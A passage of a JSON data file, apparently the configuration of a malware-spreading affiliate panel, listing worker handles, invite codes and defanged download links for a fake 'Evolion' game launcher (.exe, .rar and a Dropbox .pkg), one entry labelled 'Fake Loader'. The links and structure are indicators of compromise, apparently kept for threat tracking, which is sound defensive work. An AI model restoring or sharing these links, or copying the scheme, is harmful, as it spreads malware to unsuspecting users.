        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 106,
        "code": "JAK3-XX79",
        "worker": "12benjaminlinys - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 108,
        "code": "JAK3-I70A",
        "worker": "12benjaminlinys - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 109,
        "code": "ZA81-GDLU",
        "worker": "12b4b2188717aaaf8ff715114b39cdfeb9 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 111,
        "code": "ZA81-EO90",
        "worker": "12b4b2188717aaaf8ff715114b39cdfeb9 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 112,
        "code": "NM12-PLLG",
        "worker": "12avingon - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 114,
        "code": "NM12-RO8L",
        "worker": "12avingon - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 115,
        "code": "MI6G-SOL2",
        "worker": "12erusonyc - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 117,
        "code": "MI6G-1ION",
        "worker": "12erusonyc - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 118,
        "code": "TWW1-Q90A",
        "worker": "12PAV_LO_W - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 120,
        "code": "TWW1-PP9Z",
        "worker": "12PAV_LO_W - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 121,
        "code": "RYT2-HOP9",
        "worker": "12m0x165C - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 123,
        "code": "RYT2-VX9M",
        "worker": "12m0x165C - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 124,
        "code": "CAIP-28AE",
        "worker": "12asketq - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 126,
        "code": "CAIP-2WWL",
        "worker": "12asketq - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 127,
        "code": "RQJ2-5HUP",
        "worker": "12another1evel - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 129,
        "code": "RQJ2-SS89",
        "worker": "12another1evel - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 131,
        "code": "CY27-QUU9",
        "worker": "12shure_name_no - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 133,
        "code": "CY27-RP8H",
        "worker": "12shure_name_no - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 134,
        "code": "I2QW-RTY7",
        "worker": "12billsteine - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 136,
        "code": "I2QW-6GE8",
        "worker": "12billsteine - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 137,
        "code": "PEW5-G84K",
        "worker": "12kettoplus - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 139,
        "code": "PEW5-Y1L0",
        "worker": "12kettoplus - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 140,
        "code": "AQ6M-YA1H",
        "worker": "My code - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 141,
        "code": "FQ8K-ZBE0",
        "worker": "12Hastihit - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 143,
        "code": "FQ8K-Z2KK",
        "worker": "12Hastihit - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 144,
        "code": "SIU3-AP72",
        "worker": "12RoN771 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 146,
        "code": "SIU3-QP7M",
        "worker": "12RoN771 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 147,
        "code": "HE8A-QI65",
        "worker": "12finessetillidie - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 149,
        "code": "HE8A-S5VY",
        "worker": "12finessetillidie - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 150,
        "code": "ZI9Q-BU5M",
        "worker": "12MDMwe - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 152,
        "code": "ZI9Q-W20T",
        "worker": "12MDMwe - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 153,
        "code": "TE8B-Q3NM",
        "worker": "12TosterWhite - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 155,
        "code": "TE8B-QR1F",
        "worker": "12TosterWhite - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 156,
        "code": "WJ9X-VS12",
        "worker": "12michigun11 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 158,
        "code": "WJ9X-A30T",
        "worker": "12michigun11 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 159,
        "code": "QM2Z-IT0H",
        "worker": "12lazarev_sky - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 161,
        "code": "QM2Z-2CFL",
        "worker": "12lazarev_sky - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 162,
        "code": "T3XJ-U7NL",
        "worker": "12sssskkkiiinnnyyy - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 164,
        "code": "T3XJ-E93Q",
        "worker": "12sssskkkiiinnnyyy - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 165,
        "code": "FO6A-EE20",
        "worker": "12cpCrp - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 167,
        "code": "FO6A-K8NB",
        "worker": "12cpCrp - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 168,
        "code": "K3S5-ZC6J",
        "worker": "12Nasa1004 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 170,
        "code": "K3S5-6YEX",
        "worker": "12Nasa1004 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 171,
        "code": "DY8W-XHK4",
        "worker": "12isWayne - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 173,
        "code": "DY8W-UN3M",
        "worker": "12isWayne - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 174,
        "code": "UE1X-TT30",
        "worker": "12doaklwe - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 176,
        "code": "UE1X-K8XJ",
        "worker": "12doaklwe - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 177,
        "code": "MB7O-R21U",
        "worker": "12deadsource21 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 179,
        "code": "MB7O-9HSS",
        "worker": "12deadsource21 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 180,
        "code": "CKJ6-S8RT",
        "worker": "12vsemirnayatayna - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 182,
        "code": "CKJ6-PL62",
        "worker": "12vsemirnayatayna - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 183,
        "code": "CZJ6-TE21",
        "worker": "12antua20 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 185,
        "code": "CZJ6-YA4P",
        "worker": "12antua20 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 186,
        "code": "ARK9-POL2",
        "worker": "12Hur4k - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 187,
        "code": "ARK9-Y23V",
        "worker": "12Hur4k - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 188,
        "code": "RP9K-2GQN",
        "worker": "12SoufiwLZT - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 189,
        "code": "RP9K-J31A",
        "worker": "12SoufiwLZT - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 190,
        "code": "AQ6M-Y88N",
        "worker": "My code",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 191,
        "code": "UP12-HA6N",
        "worker": "12SeVerBeRay - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 192,
        "code": "UP12-M8KQ",
        "worker": "12SeVerBeRay - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 193,
        "code": "D1JP-LU54",
        "worker": "12fakeeee4 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 194,
        "code": "D1JP-JSA8",
        "worker": "12fakeeee4 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 195,
        "code": "EWL2-AS1M",
        "worker": "12eoy_lolz - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 196,
        "code": "EWL2-AAB1",
        "worker": "12eoy_lolz - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 197,
        "code": "KLP2-AFQ2",
        "worker": "Fake Loader",
        "link": "hxxps[://]evoliongame[.]com/Evolion\/Evolion%20Launcher[.]exe",
        "oslink": ""
    },
    {
        "id": 198,
        "code": "HJ1P-3JAQ",
        "worker": "12Yang - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 199,
        "code": "HJ1P-LMB5",
        "worker": "12Yang - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 200,
        "code": "OQP2-LSA8",
        "worker": "12clavbbbb - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 201,
        "code": "OQP2-L58M",
        "worker": "12clavbbbb - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 202,
        "code": "PFA6-RW8B",
        "worker": "12Abrahammw - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 203,
        "code": "PFA6-W51J",
        "worker": "12Abrahammw - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 204,
        "code": "HPRN-A27E",
        "worker": "12tony_df - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 205,
        "code": "HPRN-NL2S",
        "worker": "12tony_df - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 206,
        "code": "JA2L-PXU1",
        "worker": "12Playgame013 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 207,
        "code": "JA2L-PA48",
        "worker": "12Playgame013 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 208,
        "code": "XPOA-21YB",
        "worker": "12oyapgdxmo6r9uw1dk7i9 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 209,
        "code": "XPOA-N93S",
        "worker": "12oyapgdxmo6r9uw1dk7i9 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 210,
        "code": "KAL3-LSM8",
        "worker": "12dominatingscammers - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 211,
        "code": "KAL3-2WM6",
        "worker": "12dominatingscammers - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 212,
        "code": "YSAG-2NSA",
        "worker": "12emptrees - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 213,
        "code": "YSAG-K29M",
        "worker": "12emptrees - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 214,
        "code": "PNZ8-WQB2",
        "worker": "12grigoriyfringovich - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 215,
        "code": "PNZ8-M11J",
        "worker": "12grigoriyfringovich - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 216,
        "code": "XOP1-K39Z",
        "worker": "12cya2all - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 217,
        "code": "XOP1-M9KA",
        "worker": "12cya2all - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 218,
        "code": "TP2B-KUL0",
        "worker": "12Steve Willson",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 219,
        "code": "TP2B-KT89",
        "worker": "12Steve Willson",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 220,
        "code": "HP5X-E68B",
        "worker": "12YoungBoyez - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 221,
        "code": "HP5X-N8QW",
        "worker": "12YoungBoyez - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 222,
        "code": "BO9A-SBJ2",
        "worker": "21FloppaTheBig2 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 223,
        "code": "BO9A-2AIU",
        "worker": "12FloppaTheBig2 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 224,
        "code": "QMS5-K19V",
        "worker": "12pleasure_admin - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 225,
        "code": "QMS5-XVC7",
        "worker": "12pleasure_admin - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 226,
        "code": "UQ7Z-I2TW",
        "worker": "12keki4_lzt - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 227,
        "code": "UQ7Z-BSL9",
        "worker": "12keki4_lzt - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 228,
        "code": "PH8J-QIH2",
        "worker": "12JonatM - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 229,
        "code": "PH8J-NS01",
        "worker": "12JonatM - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 230,
        "code": "L1BS-WB8N",
        "worker": "12kurent27 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 231,
        "code": "L1BS-M90Q",
        "worker": "12kurent27 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 232,
        "code": "OB93-ELA6",
        "worker": "12doakhe - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 233,
        "code": "OB93-RW2L",
        "worker": "12doakhe - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 234,
        "code": "N0S7-ASV1",
        "worker": "12andallone - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 235,
        "code": "N0S7-OP2S",
        "worker": "12andallone - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 236,
        "code": "S9NA-QB1O",
        "worker": "12tylerccd1 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 237,
        "code": "S9NA-NA8K",
        "worker": "12tylerccd1 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 238,
        "code": "BO7V-SANM",
        "worker": "12LOONASCASH - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 239,
        "code": "BO7V-J1XI",
        "worker": "12LOONASCASH - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 240,
        "code": "4NAS-2KSA",
        "worker": "12adgasdgasdgasdg - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 241,
        "code": "4NAS-AM9N",
        "worker": "12adgasdgasdgasdg - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 242,
        "code": "IQP7-BA0K",
        "worker": "12youfuckingtrigger - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 243,
        "code": "IQP7-I8NP",
        "worker": "12youfuckingtrigger - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 244,
        "code": "YQM8-XIL2",
        "worker": "12crake_n1 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 245,
        "code": "YQM8-IQ8M",
        "worker": "12crake_n1 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 246,
        "code": "MCZ0-AI12",
        "worker": "12r1shaaxe - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 247,
        "code": "MCZ0-NAS0",
        "worker": "12r1shaaxe - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 248,
        "code": "PS8B-SB77",
        "worker": "12michoviqexy5 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 249,
        "code": "PS8B-MZ1K",
        "worker": "12michoviqexy5 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 250,
        "code": "YQWB-S12B",
        "worker": "12pqicuemafrnsold - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 251,
        "code": "YQWB-MM03",
        "worker": "12pqicuemafrnsold - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 252,
        "code": "BP9N-EEH2",
        "worker": "12menso228 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 253,
        "code": "BP9N-4KAC",
        "worker": "12menso228 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 254,
        "code": "ZN6G-PML2",
        "worker": "12weedtaco - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 255,
        "code": "ZN6G-NA76",
        "worker": "12weedtaco - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 256,
        "code": "YL0Q-NS7M",
        "worker": "12Cloudsez - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 257,
        "code": "YL0Q-1ASA",
        "worker": "12Cloudsez - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 258,
        "code": "WLAN-8BP2",
        "worker": "12httpsptth - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 259,
        "code": "WLAN-T62V",
        "worker": "12httpsptth - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
